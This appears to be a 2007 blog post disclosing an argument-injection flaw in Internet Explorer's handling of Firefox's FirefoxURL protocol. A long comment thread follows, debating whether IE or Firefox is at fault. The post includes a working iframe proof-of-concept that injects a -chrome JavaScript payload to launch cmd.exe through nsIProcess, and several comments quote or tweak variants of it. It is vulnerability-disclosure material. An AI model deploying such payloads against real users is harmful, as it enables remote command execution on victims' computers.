There is an input validation flaw in Internet Explorer that allows you to specify arbitrary arguments to the process responsible for handling URL protocols. This is the same type of input validation vulnerability that I discovered in the Safari 3 beta (see “Safari for Windows, 0day exploit in 2 hours“).
When Firefox is installed it registers a URL protocol handler called “FirefoxURL”. A typical shell open command for this handler is as follows:
[HKEY_CLASSES_ROOT\FirefoxURL\shell\open\command\@]
C:\\PROGRA~1\\MOZILL~2\\FIREFOX.EXE -url “%1″ -requestPending
When Internet Explorer encounters a reference to content inside the FirefoxURL URL scheme it calls ShellExecute with the EXE image path and passes the entire request URI without any input validation. A request such as the following
FirefoxURL://foo” –argument “my value
will result in the following command line being used to launch Firefox
“C:\PROGRA~1\MOZILL~2\FIREFOX.EXE” -url “firefoxurl://foo” –argument “my value/” –requestPending
As can be evidenced it is possible to specify arbitrary arguments to the “firefox.exe” process. This is where the “-chrome” command line argument comes in handy, as it allows us to specify arbitrary Javascript code which is then executed within the privileges of trusted Chrome content.
The exploit that I developed for Safari simply opened CMD.EXE without specifying any arguments, an exercise that was left for the reader. For this exploit I have chosen to demonstrate how you can specify process arguments with the nsIProcess interface found in Mozilla.
The details can be found in the @mozilla.org/process/util;1 component and the nsiProcess interface. nsIProcess takes 3 arguments:
- Blocking: Whether to wait until the process terminates before returning or not
- args: An array of arguments to pass to the process
- count: The length of the args array
As with the previous exploit it is necessary to HTML escape any characters which cannot be used directly inside the URL or the command line, such as commas and quotes. For demonstration purposes I have chosen to escape these characters with both HTML entities and dynamic string construction.
Billy Rios already highlighted a few of the shortcomings with the FirefoxURL protocol handler in “Cross Browser Scripting Demo“. The following proof-of-concept exploit takes this reasoning to its logical conclusion, namely command execution with arbitrary arguments.
<html><body>
<iframe src=’firefoxurl://larholm.com” -chrome “javascript:C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+
String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+
String.fromCharCode(92)+'cmd.exe');
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);
process.run(true,['/k%20echo%20hello%20from%20larholm.com'],1);
'><
</body></html>
Remember to remove the line breaks if you want the exploit to work, they are only there for cosmetic reasons. You can also test this exploit at http://larholm.com/vuln/firefoxurl.html.
And there you have it, a cross browser command injection vulnerability for Internet Explorer. I am currently having some fun with the Windows Help Center and Office Groove 2007, both of which exhibit some clear potentials for malicious manipulation, but that will have to wait for a later article 
hi,
the sample exploit did not work, because in my case, there’s no FirefoxURL; but there’s a FirefoxHTML URL protocol handler. I changed the sample exploit to FirefoxHTML and it worked!
but Firefox displays a warning message, saying “an external application must be launched to handle firefoxhtml: links” and it gives the user a choice to cancel
Joey, I have had some reports as well that not all Firefox installations have registered the FirefoxURL URL protocol handler. The reason for this is that the FirefoxURL handler was only added in Firefox 2.0.0.2 as part of a Vista compatibility change.
The lack of input validation is still a flaw in IE, even if Firefox could have registered their URL protocol handler with DDE instead.
I can confirm that it works. Running ff 2.0.0.4, ie6, xp sp2
\stix
Thor, it may be worth noticing that NoScript users have been protected against attacks of this kind since June, the 22th… -18day protection?
Of course at that time I couldn’t reveal the whole evilness, but as you can see, you’re credited both in the release notes and in the changelog.
Cheers
– ma1
[...] Larholm had this to say in his blog: [...]
[...] to a warning issued by hacker Thor Larholm, the issue is an input validation flaw similar to the one he [...]
If this is a IE vulnerability, does it work with other protocol handlers such as “irc://” (mIRC) or “aim://” (AOL Instant Messenger) ?
It sounds like a Firefox vulnerability.
Hi, is possible auto infected useng ?
it may be worth noticing that this is NOT an internet epxlorer flaw, but a firefox flaw.
why the author would title this article “Internet Explorer 0day Exploit” is really misleading, and shows the authors lack of understanding of how programs register URI’s.
this is CLEARLY an issue with firefox and it’s flawed URI registration.
michael.
Great Work Thor! I came to the same conclusion while working on this… Your Safari 0-day has now taken on a life of its own!
I’ve got some other interesting URI stuff, including another cmd exec in FF (IE not required in this instance), hit me up if your interested…
BK
Michael, Firefox is the current attack vector but Internet Explorer is to blame for not escaping ” (quote) characters when passing on the input to the command line. I agree that Firefox could have registered its URL handler with pure DDE instead and thereby have avoided the possibility of a command line argument injection, but IE should still be able to safely launch external applications safely.
Davo, Internet Explorer doesn’t filter the input for the irc:// or aim:// URL protocol handlers either. The exploitability on those depend on what arguments each application accepts.
Regards
Thor Larholm
Alright, I had this setup but it didnt work:
But all that happened was a ton of windows opening up and me ending firefox.exe, what’s up with that?
Lethal.Liquid, the FirefoxURL protocol handler was added in Firefox 2.0.0.2 for Vista compatibility reasons. If you upgrade your Firefox you should notice that the exploit works.
I have 2.0.0.4, have they fixed it in this version?
What happens to me is just thousands of tabs open up in firefox.
Lethal, close any currently running Firefox instances before you test the exploit. If Firefox is already running then IE doesn’t instantiate it through the command line, but through DDE instead.
Regards
Thor Larholm
Ohhhh, alright, lemme try that then.
Now I get it, sorry for the double posts, but yours works, the command line that says “hello from larholm.com” or whatever, but mine was i think supposed to give me a popup, and it doesnt. i wanted it to do a popup that says “Pwnt!”, but it doesnt work…please help?
i have the iframe source as
firefoxurl://google.com” -chrome “javascript:alert(”Pwnt!”);”
why won’t it work?
[...] Article Link [...]
it’s partly a fault in both, firefox shouldn’t have allowed it to due malicious code, but ie shouldnt allow the quote passed in the input to the command line to.
Well, why
If you can call CMD.exe by attacking IE, should you blame CMD that you can destroy your system with it? Obviously not. It is intended to have a lot of power.
Same, you should blame a server-side application for SQL injection, not the DB server. Of course, there are special cases, but normally one expects that a DB server executes any command it’s provided with; and it’s the script’s responsibility to provide it only with safe commands.
[...] in Firefox 2.0 and later, which involves a special URI handler. Although the problem was initially attributed to Internet Explorer by researcher Thor Larholm, Firefox is the [...]
[...] Thor Larholm noted: [...]
I get an “External protocol request” form that asks whether or not I want to launch the application.
-tb
bollocks.
it should never be the responsibility of the calling program. It is the target app (in this case Firefox) that bears responsibility of ensuring that all passed params include proper escape codes, prevent buffer overruns, etc.
how could IE (or other calling app) know what code/params/etc that a seperate 3rd part may have problems with?
by the way, there are tons of other ways that this Firefox flaw can be exposed. Most programs that can launch a URI could expose this flaw in Firefox.
[...] Thor Lanholm blames an input validation flaw on Internet Explorer, which can pass certain arbitrary arguments to a protocol handler installed by Firefox. [...]
trebug, close your current Firefox process before testing the exploit. I might release an updated exploit tomorrow which works even with a running Firefox process.
Michael, I think “the Igel” sums it up nicely. You can’t blame Firefox for doing what it is told to do, the only problem is that IE will let us specify more stuff that it has to do than was originally intended.
Firefox specifically expected to be called with ‘-url “SOMEURL”‘ and if IE had escaped the ” character that I added to SOMEURL then I would have never been able to specify additional command line arguments such as -chrome.
Regards
Thor Larholm
I can’t get the exploit working on Gran Paradiso 3.0a6, and I can’t figure out why. I disabled NoScript and double-checked the registry entry for firefoxurl://. I get a chain of “External Protocol Request” poupups and blank tabs.
Michael, I invite you to reconsider your argument that IE couldn’t have known how to format the firefoxurl parameter correctly.
According to the convention established by Windows, to call any external content handler you pass the URL surrounded by double-quotes. If the URL contains double-quotes, you escape them with a caret.
All the registry entry does is tell Windows which executable handles firefoxurl:// and some additional arguments to pass along with the URL. Thus if IE wants to launch a firefoxurl:// properly, it is completely clear how the parameter must look, because the calling convention is the same one IE uses to launch all other external file handlers.
Thor didn’t say this explictly, but it looks like the problem here is that IE launches all external file handlers incorrectly, and this is just an example of how that bug affects Firefox. Perhaps firefox.exe shouldn’t have a -chrome switch, but that is a completely separate question.
We should revise the comparision to SQL injection and conclude that blaming Firefox here for not catching the malicious script is like blaming the SQL server for not catching a malicious query. The calling convention is clear — escape the quotes or your request won’t get processed as intended and may cause undesired results.
So I am left asking what the value is to having a registered URI of FirefoxURL? It does not appear to be technically required for Firefox (or IE) to function (nor does FirefoxHTML)…even on a Vista desktop.
Other than the fact that after removing these URIs from HKCR in the registry I cannot indirectly invoke the Firefox browser (assumed to be for when I still use IE as the system default browser), can anybody identify an actual loss of browser functionality, stability, performance, or integrity when using Firefox?
Complete bollocks - not all applications choose to use the quote character as their literal delimiter. I’ve seen apps use anything from ” to ‘ to [] - what should IE do, escape every single character? And then how would it escape it? Some applications use “” to escape, some use \, some use… you get the idea.
This is a Firefox vulnerability and NOTHING more (incidentally, I tested it and it doesn’t work - I get infinite new tabs after the first instance spawns, but nothing else).
Claiming it’s an IE exploit is nothing but a load of FUD, and definitely lays doubt on the legitimacy of any “exploit” you claim to find.
Firefox knows how to handle the firefoxurl uri. it clearly warns you about this tricky attempt.
IE is responsible for parsing and checking URL. if it doesn’t know how to handle an item a more sensible choice would have been to disable its handling.
It’s clearly an IE issue.
[...] appears there is a new Mozilla Firefox based exploit around which (as these demos shown) can be utilised to practically run anything on your [...]
I note that IE has URL protocol handlers that use the %1 substitution to open a new window in IE, in exactly the way the Firefox URL handlers Thor describes here.
Does this mean that naked (freshly installed) Windows PCs are likely vulnerable to a similar attack, even if no other applications that use IE’s DDE features are installed?
Or is there a reason that that particular URL handler can’t be exploited?
I think those blaming firefox haven’t fully understood what is happening here.
????? ????? ????????? ?????? ??????? ??????? ????????…
????? ?? ????? ????? ???? ???????? ???????? ????? ????? ????? ???? ??????? ?????? ????? ????? ?????: IE ?? ?????????…
[...] lek is ontdekt door de Deense beveiligingsonderzoeker Thor Larholm. In een blogposting schrijft hij dat het lek erg lijkt op een lek dat hij vorige maand ontdekte in de Safari 3.0 bèta [...]
exploit does not work for PortableApps.com portable version of FireFox
[...] researcher Thor Larholm kicked off the controversy on Tuesday, claiming that he had discovered a flaw that would let an attacker run commands on a victim’s [...]
Yo!
It seems that this would take effect only on several FF/IE-Installations. On my PC (xp sp2, ie6, ff 2.0.0.4) the result is “Diese Seite kann nicht angezeigt werden” (”This page cannot be displayed”) in IE. And Firefox doesn’t know what to do with firefoxurl:// because the Registry-Entry FirefoxURL does exist, but it is empty. And no, I won’t try it again with manually added registry entries *g*
I checked this on some other PCs - same result. That’s why I think the exploit needs some more investigations (when will these registry entries be regulary added, by which setup etc.).
BR, blue….
[...] descubridor, Thor Larholm lo ha presentado como un 0-day para Explorer (y así lo ve también Security Focus), mientras en Secunia lo consideran un fallo de Firefox. [...]
[...] researcher Thor Larholm has published a description of how the security flaw works, including a proof-of-concept (though some have reported that they cannot get this to work). When [...]
[...] researcher Thor Larholm has published a description of how the security flaw works, including a proof-of-concept (though some have reported that they cannot get this to work). When [...]
[...] bug in Firefox can be exploited by Internet Explorer users. How’s that? Come again? Yes, this seems to be true! This bug is wuite similar to the one found in Apple’s Safari browser. keep on [...]
[...] researcher Thor Larholm has published a description of how the security flaw works, including a proof-of-concept (though some have reported that they cannot get this to work). When [...]
hallo please excuse my bad english,
i have a question work this exploit on alternate os with firefox ( linux or the ***BSD Unix)….
regards nicolas
[...] Larholm releases proof-of-concept for what he calls an Internet Explorer zero-day, showing how an IE user clicking on a malicious [...]
[...] descubridor, Thor Larholm lo ha presentado como un 0-day para Explorer (y así lo ve también Security Focus), mientras en Secunia lo consideran un fallo de Firefox. [...]
[...] the latest update from security researchers who initially laid the blame on Microsoft’s Internet Explorer for the latest zero-day exploit that also can afflict those using the Firefox Web [...]
[...] detaliata de catre cercetatorul in materie de securitate Thor Larholm, permite unui atacator sa execute cod [...]
[...] descubridor, Thor Larholm lo ha presentado como un 0-day para Explorer (y así lo ve también Security Focus), mientras en Secunia lo consideran un fallo de Firefox. [...]
[...] ?????1 ????? ???, ????? 2 [...]
I had expected this to be a much bigger issue than it turned out to be. Has anyone seen any exploitation of this in the wild?
Nice one thor!!!!!
This is clearly a bug in the Firefox installer. At least it’s trivial to fix.
[...] first, security researchers laid the blame for the latest zero-day exploit on Microsoft’s Internet Explorer. Later on, they found out that the problem was with Firefox [...]
So, let’s see if I’ve got this right.
1) Firefox quietly uses an extensibility point in IE to install a backdoor entry point into Firefox, to get IE users to switch to Firefox.
2) Firefox doesn’t adequately test the new entry point, and gets the security model wrong.
3) Someone finds the flaw.
4) Firefox blames it on IE, claims they are only fixing it out of respect for defense-in-depth, and Window Snyder uses the post to plug Firefox as being more secure.
Interesting.
[...] Identifier (URI). De?i problema a fost ini?ial atribuit? de c?tre cercet?tori variantei Internet Explorer, se pare c? Firefox este vinovat pentru [...]
[...] ????????, ?? ??? ???? ?????? ?? ????? ????. ???? ??? Thor Larholm ??? ????? ????? ?????? ??? ??? ???????? ??????? [...]
At least Secunia got it right; this is definitely a huge FIREFOX security flaw. Hooray for open source…
By default(2.0.0.4 offical package at least) , the url will be open with DDE mechanism instead of shell-open execution direclty.
Starting with false assumptions leads to false conclusions. Not so interesting.
Before even reading the comments here I wrote an annoyed letter to a site quoting this page almost exactly along the same lines as the Igel.
Michael: The key point here is that the flaw lies in the interaction between IE and the Windows command shell. IE constructs a Windows command shell command using a pattern. This command happens to invoke the Firefox process. Firefox expects to receive a series of arguments including parameters and a URL on the command line. By exploiting the fact that IE does not escape characters from shell commands arbitrary arguments can be given to Firefox.
There is nothing Firefox-specific about this attack and there is nothing Firefox can do about the problem in general. The problem can be solved by escaping quotes from untrusted sources before injecting them into the shell.
To #45.
It doesn’t affect any other OS than Windows.
I’ve tested also with IE6 via Linux/Wine and it’s harmless (it seems not to badly alter wine registry).
Again: the point is Mozilla was asked to add the handler as per Vista specs. Once they provided it should have been MS task to check it. As usual they didn’t.
Again: Firefox is resilient to this since it knows how to handle it.
Again: MS/IE should test features and modification they asked for before complaining.
Again: this is a pure Windows issue.
Opera 9.21 for Windows looks ok.
Using the links at http://www.xs-sniper.com/sniperscope/IE-Pwns-Firefox.html with Opera, I get this huge confirmation message:
—————————————-
The application “C:\PROGRA~1\MOZILL~1\FIREFOX.EXE -url “%1″ -requestPending” must be launched to open the link:
firefoxurl:test%22%20-chrome%20%22javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath(’C:’+String.fromCharCode(92)+String.fromCharCode(92)+’Windows’+String.fromCharCode(92)+String.fromCharCode(92)+’System32′+String.fromCharCode(92)+String.fromCharCode(92)+’cmd.exe’);process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
Do you want to proceed?
—————————————-
Yes No
—————————————-
nutpicker, the default behavior for Firefox 2.0.0.4 depends on whether Firefox is already running. If it is already running then DDE is used, if it is not running then shell-open will be used.
Regards
Thor Larholm
Interesting for me on XP Pro Thor’s demo works immediately but on XP Home regardless if firefox.exe is running or not, the firefox warning always comes on. Just testing the demo here
http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.xs-sniper.com/sniperscope/IE-Pwns-Firefox.html
which is an href and not an iframe, this demo works immediately on the XP Home.
[...] Windows 2000 to Windows 98, Windows ME, Windows Server 2003 and Windows XP. Security researcher Thor Larholm first pointed out an input validation vulnerability in Safari 3.0 following the release of Apple’s [...]
[...] Thor Larholm kicked off the controversy yesterday, claiming that he had discovered a flaw that would let an attacker run commands on a victim’s PC. [...]
[...] Larholm had this to say in his blog: [...]
[...] with IE. Firefox says it’s definitely an IE problem. Several researchers have since weighed in, pointing to so-called input validation flaws to faulty command lines to so-so URL handlers. It is Thursday as I write this, and I think it’s [...]
[...] URI. As one might expect, this URI allows a page to launch a new page in… Firefox! Thor Larholm, discoverer of the flaw, writes: “it is possible to specify arbitrary arguments to the [...]
Yes, there is a problem, but it seems Vista does at least some effort to prevent this. When I tried it on Vista, I got a nasty warning “A web site wants to open web content using this program on your computer…” blah blah blah. I doubt regular users will pay any attention to that, but it still provides some kind of protection.
[...] k?nnen von folgenden Meldungen entnommen werden:[1] http://secunia.com/advisories/25984/2 http://larholm.com/2007/07/10/internet-explorer-0day-exploit/3 http://www.heise.de/security/news/meldung/92525Ein Patch zur Behebung der Schwachstelle wurde [...]
hi larholm
is your script code
I’m not work
explorer 6.0.2900.2180/ 070227
[...] vulnerability was first made known by Thor Larholm. However he believes the problem is related to Internet Explorer as it doesn’t escape the [...]
[...] ??????Thor Larholm????????IE???????????????????????Firefox???Firefox???????? [...]
Michael, et. al.:
Quote marks are illegal characters in URIs. IE shouldn’t be passing an illegal URI to a registered URI handler, hence, IE’s fault.
… unless you can find some Microsoft documentation explicitly stating that illegal URIs may be passed to programs registering URI handlers and explaining how to avoid it?
Mat:- the data being passed is known to be a URI so characters that aren’t allowed in URIs should be quoted according to the URI convention, i.e., quote marks become %25.
[...] daher an Firefox. Wird der Aufruf in Firefox selbst eingegeben, warnt Firefox den Benutzer. Wie Thor Larholm demonstriert, führt ein Aufruf im Internet Explorer dazu, dass Firefox keine Warnu…. Das lässt sich zumindest theoretisch ausnutzen, um einen Rechner anzugreifen, auf dem beide [...]
[...] was checked in for bug 384384 which is a bug that needs both Firefox and IE to be exploited. The command injection vulnerability affected users of Internet Explorer who browsed to a malicious page assuming that they had Firefox [...]
This is obviously a firefox bug.
Why?
a) Per “The Browser Den”, firefox should not accept dangerous input from untrusted sources.
b) Internet Explorer is an integral part of the Windows operating system.
c) The Windows operating system is an untrusted source.
d) Therefore, by the Transitive Property of Untrusted Sources, firefox should not accept dangerous input from Internet Explorer.
The fact that untrusted input enters the firefox browser from the untrusted Windows OS is therefore solely a problem of firefox, not the Windows OS, which everyone expects to be full of back door entry points designed into the OS by Microsoft.
Indeed, this is identical to those idiotic SQL databases which are ripe for an SQL injection vulnerability by accepting input from perl or php.
Do I have that right?
[...] daher an Firefox. Wird der Aufruf in Firefox selbst eingegeben, warnt Firefox den Benutzer. Wie Thor Larholm demonstriert, f?hrt ein Aufruf im Internet Explorer dazu, dass Firefox keine Warnung au…. Das l?sst sich zumindest theoretisch ausnutzen, um einen Rechner anzugreifen, auf dem beide [...]
It may be the fault of both ? IE and FF!
Neither must IE call dangerous sources without the user?s approval nor should FF accept commands from other programs without asking the user.
I comprehend that IE cannot know every url it calls but if automatically invoked it can ask the user whether to execute the command or not.
Anton:- Firefox doesn’t have much choice in the matter; there’s no way it can tell whether a command is coming from another program or from the user.
It isn’t improper of IE to launch a registered external program in order to follow a link, either; however it should verify that the link is syntactically legal first.